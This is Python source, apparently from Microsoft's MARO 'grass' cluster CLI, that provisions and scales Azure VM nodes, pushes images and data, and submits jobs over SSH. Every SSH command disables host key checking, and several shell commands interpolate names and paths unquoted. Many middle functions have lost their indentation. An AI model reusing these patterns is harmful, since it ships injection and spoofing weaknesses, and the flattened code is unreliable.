    node_name = generate_node_name()
    logger.info(message=f"Creating node {node_name}")
    # Provision the VM first, then run node-side initialization on it.
    self._create_vm(node_name=node_name, node_size=node_size, node_size_to_spec=node_size_to_spec)
    self._init_node(node_name=node_name)
    logger.info_green(message=f"Node {node_name} is created")
def _delete_nodes(self, num: int, node_size: str) -> None:
    """Delete up to ``num`` container-free nodes of ``node_size`` in parallel.

    Logs a warning and deletes nothing when fewer than ``num`` nodes qualify.
    """
    # Load details
    nodes_details = self.grass_executor.remote_get_nodes_details()
    # Get deletable_nodes and check, TODO: consider to add -f
    # (comprehension instead of a manual append loop)
    deletable_nodes = [
        node_name
        for node_name, node_details in nodes_details.items()
        if node_details["node_size"] == node_size and len(node_details["containers"]) == 0
    ]
    if len(deletable_nodes) >= num:
        logger.info(f"Scaling down {num}")
        # Parallel delete
        params = [[deletable_node] for deletable_node in deletable_nodes[:num]]
        with ThreadPool(GlobalParams.PARALLELS) as pool:
            pool.starmap(
                self._delete_node,
                params
            )
    else:
        logger.warning_yellow(
            "Unable to scale down."
            f" Only {len(deletable_nodes)} are deletable, but need to delete {num} to meet the replica"
        )
def _create_vm(self, node_name: str, node_size: str, node_size_to_spec: dict):
    """Deploy a node VM from the captured node image and register its details.

    Args:
        node_name: Generated name of the node.
        node_size: Azure VM size for the node.
        node_size_to_spec: Mapping from VM size name to its Azure spec dict.
    """
    logger.info(message=f"Creating VM {node_name}")
    # Load details
    location = self.cluster_details["cloud"]["location"]
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    image_name = f"{cluster_id}-node-image"
    image_resource_id = AzureExecutor.get_image_resource_id(resource_group=resource_group, image_name=image_name)
    # Create ARM parameters and start deployment
    template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_node/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_{node_name}/parameters.json"
    )
    ArmTemplateParameterBuilder.create_node(
        node_name=node_name,
        cluster_details=self.cluster_details,
        node_size=node_size,
        image_resource_id=image_resource_id,
        export_path=parameters_file_path
    )
    AzureExecutor.start_deployment(
        resource_group=resource_group,
        deployment_name=node_name,
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Get node IP addresses
    ip_addresses = AzureExecutor.list_ip_addresses(
        resource_group=resource_group,
        vm_name=f"{cluster_id}-{node_name}-vm"
    )
    # Get sku and check gpu nums
    gpu_nums = 0
    node_size_sku = AzureExecutor.get_sku(
        vm_size=node_size, location=location)
    if node_size_sku is not None:
        for capability in node_size_sku["capabilities"]:
            # The "GPUs" capability carries the GPU count as a string value.
            if capability["name"] == "GPUs":
                gpu_nums = int(capability["value"])
                break
    # Save details
    node_details = {
        "name": node_name,
        "id": node_name,
        "public_ip_address": ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"],
        "private_ip_address": ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0],
        "node_size": node_size,
        "resource_name": f"{cluster_id}-{node_name}-vm",
        "hostname": f"{cluster_id}-{node_name}-vm",
        "resources": {
            "cpu": node_size_to_spec[node_size]["numberOfCores"],
            "memory": node_size_to_spec[node_size]["memoryInMb"],
            "gpu": gpu_nums
        },
        # A fresh node hosts no containers yet.
        "containers": {}
    }
    self.grass_executor.remote_set_node_details(
        node_name=node_name,
        node_details=node_details,
    )
    logger.info_green(f"VM {node_name} is created")
def _delete_node(self, node_name: str):
    """Delete one node: its Azure resources, deployment record, local files and status."""
    logger.info(f"Deleting node {node_name}")
    resource_group = self.cluster_details["cloud"]["resource_group"]
    # Remove the node's Azure resources, then its ARM deployment record.
    self._delete_resources(resource_name=node_name)
    AzureExecutor.delete_deployment(resource_group=resource_group, deployment_name=node_name)
    # Drop the locally generated ARM parameter files for this node.
    shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_{node_name}")
    # Mark the node deleted on the master.
    self.grass_executor.remote_update_node_status(node_name=node_name, action="delete")
    logger.info_green(f"Node {node_name} is deleted")
def _init_node(self, node_name: str):
    """Initialize a freshly created node.

    Copies the init script and cluster details to the node, runs the remote
    init, records the node's public key, marks it created, then loads the
    pushed images and the node agent service.
    """
    logger.info(f"Initiating node {node_name}")
    # Load details
    admin_username = self.cluster_details["user"]["admin_username"]
    node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
    node_public_ip_address = node_details["public_ip_address"]
    ssh_port = self.cluster_details["connection"]["ssh"]["port"]
    # Make sure the node is able to connect
    self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=node_public_ip_address)
    # Copy required files
    self._sync_mkdir(path=f"{GlobalPaths.MARO_LOCAL_TMP}", node_ip_address=node_public_ip_address)
    copy_files_to_node(
        local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/init_node.py",
        remote_dir="~/",
        admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
    )
    copy_files_to_node(
        local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/details.yml",
        remote_dir="~/",
        admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
    )
    # Remote init node
    self.grass_executor.remote_init_node(
        node_name=node_name,
        node_ip_address=node_public_ip_address
    )
    # Get public key
    public_key = self.grass_executor.remote_get_public_key(node_ip_address=node_public_ip_address)
    # Save details
    node_details["public_key"] = public_key
    self.grass_executor.remote_set_node_details(
        node_name=node_name,
        node_details=node_details
    )
    # Update node status
    self.grass_executor.remote_update_node_status(
        node_name=node_name,
        action="create"
    )
    # Load images
    self.grass_executor.remote_load_images(
        node_name=node_name,
        parallels=GlobalParams.PARALLELS,
        node_ip_address=node_public_ip_address
    )
    # Load node agent service
    self.grass_executor.remote_load_node_agent_service(
        node_name=node_name,
        node_ip_address=node_public_ip_address
    )
    logger.info_green(f"Node {node_name} is initialized")
def start_node(self, replicas: int, node_size: str):
    """Start ``replicas`` stopped nodes of ``node_size`` in parallel.

    Raises:
        BadRequestError: If fewer than ``replicas`` nodes are startable.
    """
    # Get nodes details
    nodes_details = self.grass_executor.remote_get_nodes_details()
    # A node is startable when it has the requested size and is stopped
    # (comprehension instead of a manual append loop).
    startable_nodes = [
        node_name
        for node_name, node_details in nodes_details.items()
        if node_details["node_size"] == node_size and node_details["state"] == "Stopped"
    ]
    # Check replicas
    if len(startable_nodes) < replicas:
        raise BadRequestError(
            f"No enough '{node_size}' nodes can be started (only {len(startable_nodes)} is startable)."
        )
    # Parallel start
    params = [[startable_node] for startable_node in startable_nodes[:replicas]]
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(
            self._start_node,
            params
        )
def _start_node(self, node_name: str):
    """Start one stopped node's VM and bring its services back up.

    Starts the Azure VM, marks the node started on the master, waits for SSH
    connectivity, then reloads the pushed images and the node agent service.
    """
    logger.info(f"Starting node {node_name}")
    # Load details
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
    node_public_ip_address = node_details["public_ip_address"]
    # Start node
    AzureExecutor.start_vm(
        resource_group=resource_group,
        vm_name=f"{cluster_id}-{node_name}-vm"
    )
    # Update node status
    self.grass_executor.remote_update_node_status(
        node_name=node_name,
        action="start"
    )
    # Make sure the node is able to connect
    self.grass_executor.retry_connection_and_set_ssh_port(
        node_ip_address=node_public_ip_address
    )
    # Load images
    self.grass_executor.remote_load_images(
        node_name=node_name,
        parallels=GlobalParams.PARALLELS,
        node_ip_address=node_public_ip_address
    )
    # Load node agent service
    self.grass_executor.remote_load_node_agent_service(
        node_name=node_name,
        node_ip_address=node_public_ip_address
    )
    logger.info_green(f"Node {node_name} is started")
def stop_node(self, replicas: int, node_size: str):
    """Stop ``replicas`` running, container-free nodes of ``node_size`` in parallel.

    Raises:
        BadRequestError: If fewer than ``replicas`` nodes are stoppable.
    """
    # Get nodes details
    nodes_details = self.grass_executor.remote_get_nodes_details()
    # A node is stoppable when it matches the size, is running, and hosts no
    # running containers (comprehension instead of a manual append loop).
    stoppable_nodes = [
        node_name
        for node_name, node_details in nodes_details.items()
        if (
            node_details["node_size"] == node_size and
            node_details["state"] == "Running" and
            self._count_running_containers(node_details) == 0
        )
    ]
    # Check replicas
    if len(stoppable_nodes) < replicas:
        raise BadRequestError(
            f"No more '{node_size}' nodes can be stopped, only {len(stoppable_nodes)} are stoppable."
        )
    # Parallel stop
    params = [[stoppable_node] for stoppable_node in stoppable_nodes[:replicas]]
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(
            self._stop_node,
            params
        )
def _stop_node(self, node_name: str):
    """Stop one node's Azure VM and mark it stopped on the master."""
    logger.info(f"Stopping node {node_name}")
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    # Stop the VM, then record the new state.
    AzureExecutor.stop_vm(resource_group=resource_group, vm_name=f"{cluster_id}-{node_name}-vm")
    self.grass_executor.remote_update_node_status(node_name=node_name, action="stop")
    logger.info_green(f"Node {node_name} is stopped")
def _get_node_size_to_spec(self) -> dict:
    """Return a mapping from Azure VM size name to its full spec dict.

    Sizes are listed for the cluster's configured location.
    """
    location = self.cluster_details["cloud"]["location"]
    specs = AzureExecutor.list_vm_sizes(location=location)
    # Dict comprehension instead of a manual build-up loop.
    return {spec["name"]: spec for spec in specs}
def list_node(self):
    """Pretty-print the details of every node registered on the master."""
    nodes_details = self.grass_executor.remote_get_nodes_details()
    serialized = json.dumps(nodes_details, indent=4, sort_keys=True)
    logger.info(serialized)
@staticmethod
def _count_running_containers(node_details: dict):
# Extract details
containers_details = node_details["containers"]
# Do counting
count = 0
for container_details in containers_details:
if container_details["Status"] == "running":
count += 1
return count
# maro grass image
def push_image(
    self, image_name: str, image_path: str, remote_context_path: str,
    remote_image_name: str
):
    """Push a docker image to the cluster and load it on all running nodes.

    Exactly one source must be supplied:
      * ``image_name``: a local docker image, exported via ``docker save``;
      * ``image_path``: an already-exported image file;
      * ``remote_context_path`` + ``remote_image_name``: build remotely.

    Raises:
        BadRequestError: If no usable source argument is supplied.
    """
    # Load details
    admin_username = self.cluster_details["user"]["admin_username"]
    master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
    ssh_port = self.cluster_details["connection"]["ssh"]["port"]
    # Get images dirs (remote path on the master, absolute local path)
    images_dir = f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images"
    abs_images_dir = f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/images"
    # Push image
    if image_name:
        new_file_name = get_valid_file_name(image_name)
        abs_image_path = f"{abs_images_dir}/{new_file_name}"
        self._save_image(
            image_name=image_name,
            export_path=abs_image_path
        )
        # BUG FIX: compare checksums against the sanitized file name actually
        # stored on the master (was the raw ``image_name``, which differs
        # whenever get_valid_file_name() rewrites characters).
        if self._check_checksum_validity(
            local_file_path=abs_image_path,
            remote_file_path=os.path.join(images_dir, new_file_name)
        ):
            logger.info_green(f"The image file '{new_file_name}' already exists")
            return
        copy_files_to_node(
            local_path=abs_image_path,
            remote_dir=images_dir,
            admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
        )
        self.grass_executor.remote_update_image_files_details()
        self._batch_load_images()
        logger.info_green(f"Image {image_name} is loaded")
    elif image_path:
        file_name = os.path.basename(image_path)
        new_file_name = get_valid_file_name(file_name)
        abs_image_path = f"{abs_images_dir}/{new_file_name}"
        # BUG FIX: source and target were swapped — the original copied from
        # the (not yet existing) cluster images folder into the user-supplied
        # path. Copy the user's file into the images folder under its
        # sanitized name instead.
        copy_and_rename(
            source_path=image_path,
            target_dir=abs_images_dir,
            new_name=new_file_name
        )
        if self._check_checksum_validity(
            local_file_path=abs_image_path,
            remote_file_path=os.path.join(images_dir, new_file_name)
        ):
            logger.info_green(f"The image file '{new_file_name}' already exists")
            return
        copy_files_to_node(
            local_path=abs_image_path,
            remote_dir=images_dir,
            admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
        )
        self.grass_executor.remote_update_image_files_details()
        self._batch_load_images()
    elif remote_context_path and remote_image_name:
        self.grass_executor.remote_build_image(
            remote_context_path=remote_context_path,
            remote_image_name=remote_image_name
        )
        self._batch_load_images()
    else:
        raise BadRequestError("Invalid arguments.")
@staticmethod
def _save_image(image_name: str, export_path: str):
    """Export a local docker image to a tar file at ``export_path``."""
    SubProcess.run(f"docker save '{image_name}' --output '{export_path}'")
def _batch_load_images(self):
    """Load the pushed image files on every running node, in parallel."""
    # Load details
    nodes_details = self.grass_executor.remote_get_nodes_details()
    # One (node_name, parallels, ip) triple per running node (comprehension
    # instead of a manual append loop).
    params = [
        [node_name, GlobalParams.PARALLELS, node_details["public_ip_address"]]
        for node_name, node_details in nodes_details.items()
        if node_details["state"] == "Running"
    ]
    # Parallel load image
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(
            self._load_image,
            params
        )
def _load_image(self, node_name: str, parallels: int, node_ip_address: str):
    """Load the image files on a single node (thin wrapper used by starmap)."""
    self.grass_executor.remote_load_images(
        node_name=node_name, parallels=parallels, node_ip_address=node_ip_address
    )
def _check_checksum_validity(self, local_file_path: str, remote_file_path: str) -> bool:
    """Return True when the local file's checksum matches the remote file's."""
    remote_checksum = self.grass_executor.remote_get_checksum(file_path=remote_file_path)
    local_checksum = get_checksum(file_path=local_file_path)
    return local_checksum == remote_checksum
# maro grass data
def push_data(self, local_path: str, remote_path: str):
    """Copy a local path into this cluster's shared data folder on the master.

    Raises:
        FileOperationError: If ``remote_path`` is not absolute.
    """
    # Guard first: remote paths must be absolute.
    if not remote_path.startswith("/"):
        raise FileOperationError(f"Invalid remote path: {remote_path}\nShould be started with '/'.")
    admin_username = self.cluster_details["user"]["admin_username"]
    master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
    ssh_port = self.cluster_details["connection"]["ssh"]["port"]
    copy_files_to_node(
        local_path=local_path,
        remote_dir=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data{remote_path}",
        admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
    )
def pull_data(self, local_path: str, remote_path: str):
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
if not remote_path.startswith("/"):
raise FileOperationError(f"Invalid remote path: {remote_path}\nShould be started with '/'.")
copy_files_from_node(
local_dir=local_path,
remote_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data{remote_path}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
# maro grass job
def start_job(self, deployment_path: str):
# Load start_job_deployment
with open(deployment_path, "r") as fr:
start_job_deployment = yaml.safe_load(fr)
# Standardize start_job_deployment
self._standardize_start_job_deployment(start_job_deployment=start_job_deployment)
# Start job
self._start_job(
job_details=start_job_deployment
)
    def _start_job(self, job_details: dict):
        """Send one job to the cluster master.

        The steps are ordered: the job folder is created on both sides, details
        are saved and given ids locally, the details file is copied to the
        master, and only then is the pending-job ticket created remotely.

        Args:
            job_details (dict): standardized job deployment (name, components, ...).
        """
        logger.info(f"Start sending job ticket {job_details['name']}")
        # Load details
        admin_username = self.cluster_details["user"]["admin_username"]
        master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
        ssh_port = self.cluster_details["connection"]["ssh"]["port"]
        job_name = job_details["name"]
        # Sync mkdir
        self._sync_mkdir(
            path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}",
            node_ip_address=master_public_ip_address
        )
        # Save job deployment
        save_job_details(
            cluster_name=self.cluster_name,
            job_name=job_name,
            job_details=job_details
        )
        # Set job id (must happen before the details file is copied to the master)
        self._set_job_id(
            job_name=job_name
        )
        # Sync job details to master
        copy_files_to_node(
            local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}/details.yml",
            remote_dir=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}",
            admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
        )
        # Remote start job
        self.grass_executor.remote_create_job_details(job_name=job_name)
        self.grass_executor.remote_create_pending_job_ticket(job_name=job_name)
        logger.info_green(f"Job ticket {job_details['name']} is sent")
def stop_job(self, job_name: str):
# Remote stop job
self.grass_executor.remote_create_killed_job_ticket(job_name=job_name)
self.grass_executor.remote_delete_pending_job_ticket(job_name=job_name)
def list_job(self):
# Get jobs details
jobs_details = self.grass_executor.remote_get_jobs_details()
# Print details
logger.info(
json.dumps(
jobs_details,
indent=4, sort_keys=True
)
)
def get_job_logs(self, job_name: str, export_dir: str = "./"):
# Load details
job_details = load_job_details(
cluster_name=self.cluster_name,
job_name=job_name
)
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
job_id = job_details["id"]
# Copy logs from master
try:
copy_files_from_node(
local_dir=export_dir,
remote_path=f"~/.maro/logs/{job_id}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
except CommandExecutionError:
logger.error_red("No logs have been created at this time.")
@staticmethod
def _standardize_start_job_deployment(start_job_deployment: dict):
# Validate grass_azure_start_job
optional_key_to_value = {
"root['tags']": {}
}
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_start_job.yml") as fr:
start_job_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=start_job_template,
actual_dict=start_job_deployment,
optional_key_to_value=optional_key_to_value
)
# Validate component
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/component.yml", "r") as fr:
start_job_component_template = yaml.safe_load(fr)
components_details = start_job_deployment["components"]
for _, component_details in components_details.items():
validate_and_fill_dict(
template_dict=start_job_component_template,
actual_dict=component_details,
optional_key_to_value={}
)
def _set_job_id(self, job_name: str):
# Load details
job_details = load_job_details(cluster_name=self.cluster_name, job_name=job_name)
# Set cluster id
job_details["id"] = generate_job_id()
# Set component id
for component, component_details in job_details["components"].items():
component_details["id"] = generate_component_id()
# Save details
save_job_details(
cluster_name=self.cluster_name,
job_name=job_name,
job_details=job_details
)
# maro grass schedule
def start_schedule(self, deployment_path: str):
# Load start_schedule_deployment
with open(deployment_path, "r") as fr:
start_schedule_deployment = yaml.safe_load(fr)
# Standardize start_schedule_deployment
self._standardize_start_schedule_deployment(start_schedule_deployment=start_schedule_deployment)
schedule_name = start_schedule_deployment["name"]
# Load details
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
# Sync mkdir
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules/{schedule_name}",
node_ip_address=master_public_ip_address
)
# Save schedule deployment
save_schedule_details(
cluster_name=self.cluster_name,
schedule_name=schedule_name,
schedule_details=start_schedule_deployment
)
# Start jobs
for job_name in start_schedule_deployment["job_names"]:
job_details = self._build_job_details(
schedule_details=start_schedule_deployment,
job_name=job_name
)
self._start_job(
job_details=job_details
)
def stop_schedule(self, schedule_name: str):
# Load details
schedule_details = load_schedule_details(cluster_name=self.cluster_name, schedule_name=schedule_name)
job_names = schedule_details["job_names"]
for job_name in job_names:
# Load job details
job_details = load_job_details(cluster_name=self.cluster_name, job_name=job_name)
job_schedule_tag = job_details["tags"]["schedule"]
# Remote stop job
if job_schedule_tag == schedule_name:
self.grass_executor.remote_create_killed_job_ticket(job_name=job_name)
self.grass_executor.remote_delete_pending_job_ticket(job_name=job_name)
@staticmethod
def _standardize_start_schedule_deployment(start_schedule_deployment: dict):
# Validate grass_azure_start_job
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_start_schedule.yml") as fr:
start_job_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=start_job_template,
actual_dict=start_schedule_deployment,
optional_key_to_value={}
)
# Validate component
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/component.yml") as fr:
start_job_component_template = yaml.safe_load(fr)
components_details = start_schedule_deployment["components"]
for _, component_details in components_details.items():
validate_and_fill_dict(
template_dict=start_job_component_template,
actual_dict=component_details,
optional_key_to_value={}
)
@staticmethod
def _build_job_details(schedule_details: dict, job_name: str) -> dict:
schedule_name = schedule_details["name"]
job_details = deepcopy(schedule_details)
job_details["name"] = job_name
job_details["tags"] = {
"schedule": schedule_name
}
job_details.pop("job_names")
return job_details
# maro grass clean
def clean(self):
# TODO add clean redis
# Remote clean
self.grass_executor.remote_clean(parallels=GlobalParams.PARALLELS)
# maro grass status
def status(self, resource_name: str):
if resource_name == "master":
return_status = self.grass_executor.remote_get_master_details()
elif resource_name == "nodes":
return_status = self.grass_executor.remote_get_nodes_details()
elif resource_name == "containers":
return_status = self.grass_executor.remote_get_containers_details()
else:
raise BadRequestError(f"Resource '{resource_name}' is unsupported.")
# Print status
logger.info(
json.dumps(
return_status,
indent=4, sort_keys=True
)
)
# maro grass template
@staticmethod
def template(export_path: str):
# Get templates
command = f"cp {GlobalPaths.MARO_GRASS_LIB}/deployments/external/* {export_path}"
_ = SubProcess.run(command)
# Utils
def _delete_resources(self, resource_name: str):
# Get params
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
# Get resource list
resource_list = AzureExecutor.list_resources(resource_group=resource_group)
# Filter resources
deletable_ids = []
for resource_info in resource_list:
if resource_info["name"].startswith(f"{cluster_id}-{resource_name}"):
deletable_ids.append(resource_info["id"])
# Delete resources
if len(deletable_ids) > 0:
AzureExecutor.delete_resources(resources=deletable_ids)
def _sync_mkdir(self, path: str, node_ip_address: str):
"""Mkdir synchronously at local and remote.
Args:
path (str): path of the file, should be a string with an initial component of ~ or ~user
node_ip_address (str): ip address of the remote node
"""
# Create local dir
os.makedirs(os.path.expanduser(path), exist_ok=True)
# Create remote dir
self.grass_executor.remote_mkdir(node_ip_address=node_ip_address, path=path)
class ArmTemplateParameterBuilder:
    """Build ARM-template parameter dicts for the Azure resources of a grass cluster.

    Each public builder loads the matching ``parameters.json`` shipped with the
    grass lib, fills in cluster-specific values and, when ``export_path`` is
    truthy, also writes the result to disk. The three VM builders previously
    duplicated the same fill-in block; it now lives in ``_fill_vm_parameters``.
    """

    @staticmethod
    def _load_base_parameters(template_name: str) -> dict:
        # Load the raw ARM parameter file for the given deployment template.
        with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/{template_name}/parameters.json", "r") as f:
            return json.load(f)

    @staticmethod
    def _fill_vm_parameters(parameters: dict, cluster_details: dict, resource_name: str, node_size: str) -> None:
        # Fill the fields shared by every VM deployment (master, build VM, worker node).
        cluster_id = cluster_details["id"]
        ssh_port = cluster_details["connection"]["ssh"]["port"]
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["networkInterfaceName"]["value"] = f"{cluster_id}-{resource_name}-nic"
        parameters["networkSecurityGroupName"]["value"] = f"{cluster_id}-{resource_name}-nsg"
        parameters["virtualNetworkName"]["value"] = f"{cluster_id}-vnet"
        parameters["publicIpAddressName"]["value"] = f"{cluster_id}-{resource_name}-pip"
        parameters["virtualMachineName"]["value"] = f"{cluster_id}-{resource_name}-vm"
        parameters["virtualMachineSize"]["value"] = node_size
        parameters["adminUsername"]["value"] = cluster_details["user"]["admin_username"]
        parameters["adminPublicKey"]["value"] = cluster_details["user"]["admin_public_key"]
        parameters["sshDestinationPort"]["value"] = f"{ssh_port}"

    @staticmethod
    def _export_parameters(base_parameters: dict, export_path: str) -> None:
        # Persist the parameter file if an export path is given.
        if export_path:
            os.makedirs(os.path.dirname(export_path), exist_ok=True)
            with open(export_path, "w") as fw:
                json.dump(base_parameters, fw, indent=4)

    @staticmethod
    def create_vnet(cluster_details: dict, export_path: str) -> dict:
        """Build parameters for the cluster virtual network deployment.

        Returns:
            dict: the full ARM parameter document (with 'parameters' filled in).
        """
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters("create_vnet")
        parameters = base_parameters["parameters"]
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_master(cluster_details: dict, node_size: str, export_path: str) -> dict:
        """Build parameters for the master VM deployment."""
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters("create_master")
        ArmTemplateParameterBuilder._fill_vm_parameters(
            parameters=base_parameters["parameters"],
            cluster_details=cluster_details,
            resource_name="master",
            node_size=node_size
        )
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_build_node_image_vm(cluster_details: dict, node_size: str, export_path: str) -> dict:
        """Build parameters for the temporary VM used to build the node image."""
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters("create_build_node_image_vm")
        ArmTemplateParameterBuilder._fill_vm_parameters(
            parameters=base_parameters["parameters"],
            cluster_details=cluster_details,
            resource_name="build-node-image",
            node_size=node_size
        )
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_node(
        node_name: str, cluster_details: dict,
        node_size: str, image_resource_id: str,
        export_path: str
    ) -> dict:
        """Build parameters for a worker node VM created from a custom image."""
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters("create_node")
        parameters = base_parameters["parameters"]
        ArmTemplateParameterBuilder._fill_vm_parameters(
            parameters=parameters,
            cluster_details=cluster_details,
            resource_name=node_name,
            node_size=node_size
        )
        # Worker nodes additionally boot from the prebuilt node image.
        parameters["imageResourceId"]["value"] = image_resource_id
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import base64
import json
import time
from subprocess import TimeoutExpired
from maro.cli.utils.params import GlobalPaths
from maro.cli.utils.subprocess import SubProcess
from maro.utils.exception.cli_exception import CliError, ClusterInternalError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassExecutor:
    """SSH wrapper around the management scripts deployed on grass cluster nodes.

    Every ``remote_*`` method builds an ssh command against the cluster master
    (or a specific node) and runs it through ``SubProcess``. Fix in this
    revision: ``delete_master_details`` now honors the configured ssh port like
    every other remote call (it previously omitted ``-p`` and so failed on
    clusters using a non-default port).
    """

    def __init__(self, cluster_details: dict):
        # Connection details reused by every remote command.
        self.cluster_details = cluster_details
        self.cluster_name = cluster_details["name"]
        self.admin_username = self.cluster_details["user"]["admin_username"]
        self.ssh_port = self.cluster_details["connection"]["ssh"]["port"]

    def remote_build_image(self, remote_context_path: str, remote_image_name: str):
        """Build a docker image on the master from a remote build context."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.build_image "
            f"{self.cluster_name} {remote_context_path} {remote_image_name}'"
        )
        _ = SubProcess.run(command)

    def remote_clean(self, parallels: int):
        """Run the clean script on the master across all nodes."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.clean {self.cluster_name} {parallels}'"
        )
        _ = SubProcess.run(command)

    def remote_get_checksum(self, file_path: str) -> str:
        """Return the checksum of a file on the master, as printed by the remote script."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_checksum {file_path}'"
        )
        return_str = SubProcess.run(command)
        return return_str

    def remote_get_jobs_details(self):
        """Return all job details from the master as a dict."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_jobs_details {self.cluster_name}'"
        )
        return_str = SubProcess.run(command)
        return json.loads(return_str)

    def remote_get_master_details(self):
        """Return the master node details as a dict."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_master_details {self.cluster_name}'"
        )
        return_str = SubProcess.run(command)
        return json.loads(return_str)

    def remote_get_node_details(self, node_name: str):
        """Return one node's details as a dict."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_node_details {self.cluster_name} {node_name}'"
        )
        return_str = SubProcess.run(command)
        return json.loads(return_str)

    def remote_get_nodes_details(self):
        """Return all node details as a dict keyed by node name."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_nodes_details {self.cluster_name}'"
        )
        return_str = SubProcess.run(command)
        return json.loads(return_str)

    def remote_get_containers_details(self):
        """Return all container details as a dict."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
